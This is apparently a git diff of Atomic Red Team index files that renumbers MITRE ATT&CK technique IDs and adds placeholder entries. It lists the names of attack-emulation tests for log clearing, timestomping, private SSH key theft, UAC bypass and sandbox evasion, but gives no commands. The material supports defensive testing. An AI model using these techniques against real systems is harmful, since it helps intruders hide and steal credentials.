+defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
+defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
+defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
+defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
+defense-evasion,T1070.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
-defense-evasion,T1551,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
+defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
@@ -131,9 +131,9 @@ defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),88
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
-defense-evasion,T1551.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
-defense-evasion,T1551.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
+defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
+defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
@@ -177,10 +177,10 @@ defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Exe
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
-defense-evasion,T1551.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
-defense-evasion,T1551.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
-defense-evasion,T1551.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
-defense-evasion,T1551.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
+defense-evasion,T1070.006,Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
+defense-evasion,T1070.006,Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
+defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
+defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 255e195c..af53cfc7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -30,6 +30,7 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -199,6 +200,7 @@
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -275,7 +277,7 @@
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -294,6 +296,7 @@
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
@@ -318,7 +321,7 @@
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -412,6 +415,7 @@
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
@@ -455,7 +459,8 @@
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
@@ -463,11 +468,11 @@
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
-- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
+- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -481,18 +486,22 @@
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
+- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
+- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
@@ -527,11 +536,12 @@
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
@@ -549,6 +559,7 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -566,7 +577,7 @@
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551 Indicator Removal on Host](../../T1551/T1551.md)
+- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
@@ -608,6 +619,7 @@
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
@@ -627,7 +639,7 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
-- [T1551.005 Network Share Connection Removal](../../T1551.005/T1551.005.md)
+- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
@@ -651,7 +663,8 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -682,7 +695,7 @@
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
-- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -690,6 +703,7 @@
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -735,7 +749,7 @@
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
@@ -745,7 +759,7 @@
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -919,6 +933,7 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
@@ -948,6 +963,9 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
@@ -955,9 +973,6 @@
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -971,6 +986,7 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
@@ -1013,8 +1029,11 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1059.005 VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -1070,6 +1089,7 @@
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
@@ -1120,7 +1140,7 @@
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1132,7 +1152,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 41f4ea3c..cdbafddc 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -69,6 +69,7 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
@@ -86,15 +87,16 @@
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
@@ -116,12 +118,14 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
@@ -140,7 +144,7 @@
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
@@ -148,13 +152,18 @@
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
@@ -163,9 +172,10 @@
